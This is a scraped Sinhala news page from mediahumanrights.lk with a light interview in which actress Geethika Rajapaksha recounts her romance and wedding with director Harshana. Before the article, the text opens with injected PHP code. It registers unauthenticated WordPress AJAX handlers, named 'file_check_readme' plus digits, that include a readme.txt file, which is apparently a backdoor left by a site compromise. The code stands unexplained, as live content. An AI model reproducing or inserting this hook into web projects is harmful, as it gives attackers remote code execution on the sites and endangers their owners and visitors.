if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ගීත රූප රචනාවක්‌ ගීතිකාගේ ආදර ලෝකයේ දොරගුළු විවර කරයි... - mediahumanrights.lk
mediahumanrights.lk
Entertainment Entertainment News News

ගීත රූප රචනාවක්‌ ගීතිකාගේ ආදර ලෝකයේ දොරගුළු විවර කරයි…

අහසක්‌ එළිය කරන්න ඕනෑ සඳක්‌ විතරමයි. පුංචි තරුඑළි දහස්‌ ගාණක්‌ තිබුණත් සඳෙන් ලැබෙන එළිය අහසට දෙන්න බැහැ. ඔයා සඳක්‌ මගේ ලෝකෙට පායා ආපු පුරහඳක්‌. ඒ සඳ එළියට අහසක්‌ තරම් විසල් ආදරයක්‌ එක්‌ක තුරුළුවෙන හැම මොහොතකම මගේ හිත නිවෙන තරම් ඔයා දන්නවද? ඇත්තටම ඒ තමයි ආදරයක උපරිමය. පුංචි තිරයේ පුංචි සුරංගනාවිය ගීතිකා රාජපක්‌ෂ තමන්ගේ හිත ඇඳි ආදර හීනය යථාර්ථයක්‌ වුණහැටි කියන්න ආදර හැන්දැවට ආව දවසේ මම ඇගෙන් මෙහෙම ඇහුවා.
ආදරයට ආදරය කරන්න පටන් ගත්ත දවසේ ආදරය මොනවගෙයි කියලද ගීතිකාට හිතුණේ?
ජීවිත කාලයක්‌ ඇසුරු කළත් කෙනෙක්‌ ගැන හැමදාමත් ඉගෙන ගන්න දෙයක්‌ තියෙනවා වගේ ආදරයත් හැමදාත් අලුත් වෙනවා. අපි දෙන්නම තවම හඳුනගන්න උත්සාහ කරමින් ඉන්නවා.
ගීතිකාගෙයි හර්ෂණගෙයි ආදර ලෝකේ දොරගුළු විවර කළ පළමු හමුවීම?
අපි මුණගැහෙන්නේ ගීතයක රූප රචනාවකට ගිය අවස්‌ථාවකදී. හර්ෂණ තමයි ඒ මියුසික්‌ වීඩියෝ එකේ අධ්‍යක්‌ෂවරයා සහ කැමරා ශිල්පියා වුණේ. මම එහි රූපරාමු වලට පෙනී හිටියා. ඒ සිදුවීමෙන් පස්‌සෙ අපි දෙන්න ෆේස්‌බුක්‌ හරහා නිතරම අදහස්‌ හුවමාරු කරගත්තා. නමුත් අපි දෙන්න ළඟම අපේ දුරකථන අංක තිබුණේ නැහැ.
මුහුණුපොත හරහා අදහස්‌ හුවමාරු වෙද්දි ගීතිකා හිතුවද හර්ෂණ තමන්ගේ ප්‍රේමයේ අයිතිකාරයා කියලා?
ඒ වෙද්දි මම විවාහ වෙන්න හොඳ කෙනෙක්‌ හොයමින් හිටියේ. අපේ ගෙදරිනුත් මාව විවාහ කරල දෙන්න කෙනෙක්‌ හොයමින් හිටිය කාලේ. එක දවසක ෆේස්‌බුක්‌ එකේ චැට්‌ කර කර ඉද්දි මම කිව්වා මම දැන් බොරලැස්‌ගමුවේ ව්‍යායාම මං තීරුවට යනවා ව්‍යායාම කරන්න කියලා. එයත් එතැනට ව්‍යායාම කරන්න යන කෙනෙක්‌. ඒත් එතැනදිවත් මින් පෙර අපි මුණගැගිලා තිබුණෙ නැහැ.
මේ ආදර කතාවේ පළමු ආදරණීය හමුවීම වෙන්නෙ ඒ දවසද?
මියුසික්‌ වීඩියෝ එකෙන් පස්‌සේ දෙවැනි වතාවට අපි බොරලැස්‌ගමුවෙ ජොගින් පාක්‌ එකේදි හමුවුණා. එදා තමයි අපි පළමු වරට දුරකථන අංක හුවමාරු කරගෙන අපේ ආදරයට මූලික පදනම දැම්මේ.
ආදර කතාවට වැඩිහිටියන් දක්‌වපු ප්‍රතිචාර යහපත් වුණාද?
අපේ ගෙදරින් මුලින්ම කැමැති වුණේ නැහැ. අපේ අම්මල තාත්තල බලාපොරොත්තු වුණේ වෙන පැත්තකින්නේ. කලාවෙම කෙනෙක්‌ එක්‌ක මම විවාහ වෙනවට කැමැති වුණේ නැහැ. ඒත් මම තරයේම කියා හිටියා මට මේ විවාහය කරල දෙන්න කියලා. ඊට පස්‌සෙ ගෙදරින් හොයල බලලා කැමැති වුණා.
පෙම්කතාව මල් ඵල දරලා දෙන්න එක වහළක්‌ යටට එන දවස ගැන මල්බර මතකයත් තවමත් අලුත් නේද?
අපි මුණගැහුණේ 2016 පෙබරවාරි මාසෙ. 2016 අගෝස්‌තු 22 අපි විවාහ වුණා. උත්සවය ගත්තේ දූපතක. බෙහොම සරළ විදිහට ස්‌වභාවික දේවල්වලට මුල් තැන දෙමින් සීමිත පිරිසක්‌ එක්‌කයි අපි විවාහ උත්සවය සැමරුවේ. අපිට හිතවත් අවංකව ආශිර්වාද කරන සුළු පිරිසකට විතරයි ඇරයුම් කළේ. මොකද එතැන පුංචි දූපතක්‌ නිසා ලොකු පිරිසකට ඉඩකඩ තිබුණෙ නැහැ. අපි ළඟින්ම හිටි සීමිත පිරිසක්‌ තමයි අපේ විවාහ උත්සවයට ආවේ. එතැනදී අපි ඇරයුම් පතේ සඳහන් කළා සරළ ඇඳුමෙන් සැරසිලා මේ අවස්‌ථාවට සහභාගි වෙන්න කියලා.
හර්ෂණගේ ආදර හිතෙන් ගීතිකාට ලැබුණ අමතක නොවන තිළිණය මොකක්‌ද?
එයා මට ගොඩක්‌ තෑගි අරන්දීලා තියෙනවා. ඒ අතරින් අපි විවාහ වෙලා එළැඹුණ පළමුවැනි පෙම්වතුන්ගේ දිනයේදී මට ලොකු තෑග්ගක්‌ අරගෙන ආවා. මමත් හරි ආසාවෙන් වාහනයේ තිබුණ ලොකු පාර්සලය ගෙට අරගෙන ගිහින් විවර කළා. එය ගොඩක්‌ මිල අධික මුළුතැන්ගෙයි ඉවුම්පිහුම් කරන උපකරණයක්‌. ඒත් එයාගේ නොතේරුම්කම නිසා හරියට ක්‍රියාත්මක නොවන එකක්‌ ගෙනත් තිබුණේ. ඒ වෙලාවේ මට හරියට තරහ ගියා. නමුත් දැන් නම් පව් කියල හිතෙනවා. එයා එදා මට ලොකු වටිනාකමක්‌ තියෙන තෑග්ගක්‌ දෙන්නයි උත්සාහ කළේ. එයාට මුළුතැන්ගෙයි උපකරණ ගැන අවබෝධයක්‌ නැති නිසා ඒක හරියට තෝරගන්න බැරිවුණා.
පෙම්වතා සහ පෙම්වතිය ලෙස ගෙවූ කාලය සහ අඹුසැමියන් ලෙස ගෙවන අද දවසේ ඔබලාගේ ආදර ලෝකය ගැන කියනවා නම්?
කෙනෙක්‌ව අවුරුද්දකින් දෙකකින් අඳුරගන්න බැහැනේ. අපි මැරෙන තුරාවට පුද්ගලයන් අඳුරගන්න උත්සාහ කරනවා කියලයි මට හිතෙන්නේ. ඉතින් අපි අතරේ තියෙන නොගැලපීම් තේරුම් අරගෙන ඒ දෙස මැදිහත්ව බලමින් ජීවිත ඉදිරියට ගෙනයන්න තමයි උත්සාහ කරන්නේ. ඇත්තම කියනවා නම් තවම අපි ආදරය හඳුනාගනිමින් ඉන්නවා.
ඔබ දෙදෙනා ඔබ දෙදෙනා තුළින් දකින විශේෂ ගතිගුණ මොනවාද?
එයා මට නිදහස දීලා තියෙනවා. මට ඒ නිදහස හරිම වටිනවා. මා ගැන එයා හිතන විදිහ එයාගෙන් තමයි අහන්න ඕනෑ. ඒත් මම හිතනවා කවුරුහරි එයාගෙන් මම මොනවගේද කියල ඇහුවොත් එයා කියයි මම හරිම ආත්මාර්ථකාමී කියලා. ඒක එහෙම තමයි. මම ආදරය කරද්දි හරිම ආත්මාර්ථකාමියි.
ආදර ලෝකයේ සමගිය වෙනුවෙන් නිළියක්‌ විදිහට ගීතිකාට සීමාවන් තියෙනවාද?
එයා මට සීමාවන් දාල නැති වුණාට මම මගේ රංගනයට සීමාවන් දාගෙන තියෙන්නේ. අපි දෙන්නගේ සතුට සමගිය වෙනුවෙන්.
(දිවයින පුවත්පත ඇසුරෙනි)

Related posts

ගම්මිරිස් ගොවීන් අසීරුවේ

Shiran Viraj

අලුත් සභාපති ශ‍්‍රී ලංකා ඉන්ෂුවරන්ස් කණපිට ගහයි..

Shiran Viraj

බෞද්ධයන්ට නායකත්වය දෙන්න..ඒකීය රට රකින්න- ඥාණසාර හිමි බලන්න වැලිකඩ ගොස් ඇමති රවී ඉල්ලයි

Shiran Viraj